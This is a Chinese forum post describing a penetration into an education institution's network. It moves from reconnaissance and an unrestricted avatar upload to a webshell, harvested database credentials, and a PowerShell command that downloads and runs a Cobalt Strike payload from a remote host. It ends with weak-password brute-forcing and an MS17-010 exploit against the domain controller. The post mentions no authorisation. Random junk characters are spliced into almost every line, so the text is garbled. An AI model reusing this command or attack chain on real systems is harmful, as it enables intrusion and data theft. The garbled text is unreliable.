|
8 h1 l9 V$ H+ _1 e* ^6 B* q) M
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路! y- ~8 k4 O, a9 i3 x, s& c& B
' j( ^ A4 B7 K4 R# V2 r, b4 P6 T
* O) Y# X2 L, _- [# o; Q
. l- j* d \, @' C/ ^% }
# B8 ^ K3 S* G. w* V* N$ H! o5 `
6 ~/ P, o# J: x e, X1 d0 }$ j 正文0 H/ a4 o2 U' y+ Z- G) p
& A4 X$ u+ {& ^& x
; u7 M% _5 c% s: P) [- [$ A' w
- G8 Z3 B. \2 p. c" W4 E! ?
# N* p$ G+ i: G/ q3 U/ y7 q, K* r* L! q
目标:www.xxxx.com(一家教育机构) # z7 _7 Z7 u% M) h
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能" M: k, I* N8 X5 g
" f2 u" B8 _( o3 A! k" Z( _: U
- j! V8 R: T7 w) D; v s7 j
. e3 c( r0 e8 j$ _( a
8 J$ Y& b; J. D) e4 H* T) f1 g5 M3 @* j6 r+ p( Z! w
进行了简单的信息搜集 ; Y% C. l0 N( e% V3 L) E2 e4 p- T
/ Z# c$ f7 [) q" \9 f, I( l0 \0 X0 |6 G1 G( F
0 K! D& r# u. w! O u3 t# F3 Y$ f. l- B8 r
子域名搜集
6 |1 h6 v% h! M! E/ X) l 5 e2 J, |5 [6 j& h
) N5 Q% E. _: B5 B3 | ; I' H# P4 U% ]" t0 H
4 x4 h" z' Y0 w$ O6 H# s6 G) _9 C ]
fofa找资产 - ?7 X+ n; V& T
$ K$ ]. ]6 N$ I. o. D, d7 k
4 |7 Y' q( T% d! @8 j 2 Q/ D/ w* H: c$ R$ c: {
# v8 i5 [2 o, e% v6 H) p
3 O- |& E& Z" u( ?
, F# I$ Z# T, c7 F0 l* h8 p! T7 w5 Z: ~# |3 J' ~
一共七个资产。去重之后只有两个。
6 a5 P0 ] U& W8 l6 n 6 b- a5 y0 c$ Z0 l; Y
# U- B ^' U3 e7 D% j% o* `
' i4 l# Y& B' j& D$ {8 o0 M- h) s2 J1 S/ f. }7 I
目录探测
+ _7 u: _+ i+ L) K8 g$ P& ?" T ' D) x: }, s( m, o' v
" l0 n& }% X W
& ~+ O$ G" b% Q, x7 Y/ B
: X) y- f. u- ~6 N
' Z8 B5 C8 N3 e) b6 ^ d* S
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% m2 H1 \0 `( O. @" ^. c
/ O1 T9 s" d5 S% B8 q2 E& R
1 A Y K! e$ f+ c, K% h; u; ^
( h& |- P2 ~6 ]8 @5 F, m5 q
/ X9 l+ C4 j; W. V& ^9 N 我又尝试了通过修改返回包来绕过登录界面
4 A1 L$ }+ S$ ?: Y" \* W
/ v' {" o9 a9 W
\7 c/ O* i! r5 U0 j) Y
4 x* j8 S. t" r* u
Z: N0 P J8 F2 C: L
T; E3 U4 Y4 g1 C2 } 还是不行,尝试注入无果: Q7 q4 U$ ^* k" {: s. w
9 F! g9 _. S& X& o: \
) T$ v3 a! U9 k; @' b % g1 k9 E# H7 X. s7 S1 t
8 o5 ?: Y; _5 l' I# r% {5 T& M; X( [' D" I' y: }& w
不过我目录探测出了一处Spring信息泄露 , U; ~( H8 D2 q# f( {8 \
2 i, j k, x J b9 K2 _: Y
, z, u! a# @4 C, A
/ v3 G0 @5 K# `2 h7 O) E& G4 I4 z4 Y' [3 o# n3 W
6 b/ v6 y! ^" ^9 L 3 \# N8 r9 w4 m4 j: e3 q
8 W l6 G0 q' p8 d 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
+ b# z0 `# b. @/ V 4 P( V; v6 t* d0 b. Q$ s7 t# E
5 }+ j% J) d/ i% m7 W# ]9 i/ u
! H' `5 z" D6 e$ u2 O& Z/ x0 }
: d0 x7 z1 G# _4 |
: S5 c. v, _0 Z+ s- w
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。) l% I6 S. y( {# d
- G5 w( I% F6 v W4 u! O
0 x. z; [7 A9 n# ^: A3 B
/ n7 y, R4 L5 l, {2 y0 m' d' M
6 J0 H! t: E. l$ w4 V. P0 d& Q+ g" k
获取有些师傅到这一步就手机抓包电脑测了。
! N) N: h: T! P' M2 o ' L+ q6 n0 W6 k- R+ F
& [- W: G9 Y% m; r1 W& |7 n+ _
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。( g) P' p: d& s
, R: [! N$ q8 b5 _/ w# U8 a, Z
$ { K$ ?: P: [) A 其中在一个公众号发现了小程序,可以进行注册。 m2 f8 Y9 w1 ~4 Q; T4 n
$ J. S8 o( {$ G! @6 J/ J: Z- p8 T0 U$ ^
看到了头像上传,尝试上传获取WebShell
5 h2 r2 n& f8 S& i6 M- Q# b! a$ o
* G% } Z4 N( \& i4 m" }# T) C2 y8 h) s! I, p# ~6 M
$ m! C5 `' x: g# u 4 u% p2 [3 n5 K2 @, z9 ^9 g
$ Q' F; u5 ]2 s. b0 r$ a* P 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
' c) D& k( d( o- [3 @/ Y
J2 d+ ~: ~ w# N0 _. K: n: ^
! f8 v( \0 ~6 o- m3 P: _; z7 m : O- o) ~. b2 z0 L
0 i/ [( }! i x* Y o4 x8 |* p5 @* [, f3 C; C/ J) U' v7 z7 |
然后上了大马9 F7 N6 k1 r! k! R6 E7 D
2 q- J: g- y/ h/ Z0 A P
! g% K. v* M& X6 i8 z 4 l% @! `; m7 E @( f2 r& m% g
2 K! p* i; g' p( `$ |
" k- S8 @, M) G% V! }% w* T! c* V
/ n: c/ S i' \" o. ?6 U 2 Z9 M4 q ^6 z& ^
% i. F5 n/ r+ d 通过翻找文件发现数据库账号密码
: y0 E2 B) d8 m) R 0 F' P. l( W2 ~' m4 h
: N/ R+ B" L$ h. Y9 ?6 r7 z
; P+ o# ]: b- j: ]3 m0 a. x
2 E9 B( N( h( ]+ n& H3 s" U6 K' p
: m; Q& e- w* q
--内网渗透 Z7 F8 |. f; }& F7 S5 b3 d
: f" k/ m. C: e7 r$ |: Y7 ]4 f
+ k3 W8 B% }0 A/ L
直接通过powershell执行 cs上线
. i1 }" H3 _- ]# O. S% N
* q. \9 D6 c* V* J2 g: |+ S% v9 z, D3 Z" y( ^
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
1 M0 M6 P! q7 a7 s( ?
) i" l1 D8 O" [6 Z8 ^. j2 E. X, Z2 |2 z( n2 X, Z7 o
% X/ h. f3 C) c+ O7 B
8 C8 v6 e) ^) y' T1 ^5 ] J: s* B" k" a3 \
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破' N+ Z w' t3 K: G& |9 ~3 r/ m
0 A* `* H9 B6 Q! {- N/ `- D
; s) a4 v1 Q. k2 ]- f0 w
7 M( ^3 {$ X: k E8 o
9 y/ d! u2 ~" U7 B
, e. [: ?/ k" X! t! }; b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 ! X- z m8 B: A, \1 D) Q; M
! Z9 Z# u6 M" Z( O , Y- f: J' u0 F) t" q
! z5 Z6 _% Q9 b* U
5 a$ ?( y4 s9 r" ^, @7 R. u3 a" F! t% E0 ^" |9 R
1 b. x( R B! C! C! a5 b1 z9 u E# a. b. e x. j. K, E1 N& }
. d$ g' B2 d0 t6 S' U
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 , W% d9 {" l# f& f* v9 p
4 ]; F" F" l( y! V( }" n" ~( y& E; l/ @- `
8 y C2 r# |; E4 ~
! J( A1 r* H- V. m2 R% M& R
- f" H' n8 F8 ]' J' p8 b4 t3 L
! X8 k9 p/ q4 s- C
6 D3 @; I. ^( c# d& ? E
. `1 A2 G5 E. U1 ]: u
- O9 x- F3 [9 P
# f* ~" ^" _9 L- Y9 [' e% j% s
# z3 v, [( Q2 w
4 }* g& Q: m% H' P8 a 6 J) i& Y j7 |- U
7 ], y- d- C0 |/ u& j7 x
- g6 p; M9 w! }$ o4 k) V) G, x- [
小结
3 u! { _/ d" J" Q' i: w
4 l. a/ @4 G0 ?* `- C. | }' F6 l$ r, ^
) `* K6 a! p9 E$ ~& ` 4 z p. e" Z' V. L
! B9 v; W" ?3 S! V+ X5 j) ? 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!8 W, K- h: d" Y
6 g7 [ K7 p- a7 x+ U/ i @+ F# C
2 B6 C$ a H6 |' I- D3 _( I
1 A2 q2 ] C: ?) K8 P% D. \
8 H" P) Y. v8 h' y: y8 C& M7 X9 U! I' U& c" e
-
- `" e! r Y0 o5 S( u$ ?9 R % H. r+ e f- g' O* {% |" o
; ?) |5 l5 D4 h - . c, m- c4 u; Q ~
9 m! n, J4 z0 b$ {" r( h
1 _+ C9 X6 Y1 Q; A3 o/ h4 U
5 l! B/ d' G+ N4 J* {9 ^1 V
3 f" p8 M B) p6 Z+ D; e: ]0 M 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
& |* ~% h: I2 r0 v9 i, f' X
! j6 v7 [- s: {) L" U! v/ i r* y! E
k; `4 g# v/ d7 q- t1 E / K% P: f# s) T* n" M% a
|